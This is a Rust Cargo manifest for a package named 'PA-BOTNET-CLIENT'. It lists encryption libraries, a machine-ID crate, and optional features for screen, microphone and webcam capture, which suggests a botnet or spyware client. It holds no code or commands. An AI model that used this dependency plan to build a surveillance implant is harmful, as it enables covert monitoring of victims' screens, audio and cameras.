[package]
name = "PA-BOTNET-CLIENT"
version = "0.1.0"
edition = "2021"

# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html

[dependencies]
ipnetwork = "0.20.0"
regex = "1.4"

serde_json = "1.0.111"
object = { version = "0.32.2", features = [] }
serde = { version = "1.0.194", features = ["derive"] }
rsa = "0.9.6"
rand = "0.8.5"

aes = { version = "0.8.3", features = [] }
cbc = "0.1.2"
block-modes = "0.9.1"
hex-literal = "0.4.1"
hex = "0.4.3"
base64 = { version = "0.21.7", features = [] }
generic-array = "0.14.7"
machine-uid = "0.5.1"
typenum = "1.17.0"
write = "0.1.0"
config = "0.13.4"

# Features dependecies (Jiullian)
xcap = { version = "0.0.4", optional = true}
cpal = { version = "0.15.2", optional = true}
hound = { version = "3.5.1", optional = true}
rscam = { version = "0.5.5", optional = true}
camera_capture = {version = "0.5.0" , optional = true}
image = { version = "0.24.9", optional = true}
scrap = { version = "0.5.0", optional = true}

[features]
libraries = ["dep:xcap", "dep:cpal", "dep:hound"]
camera_linux = ["dep:rscam"]
camera_windows = ["dep:camera_capture", "dep:image"]
libraries_windows = ["dep:scrap"]
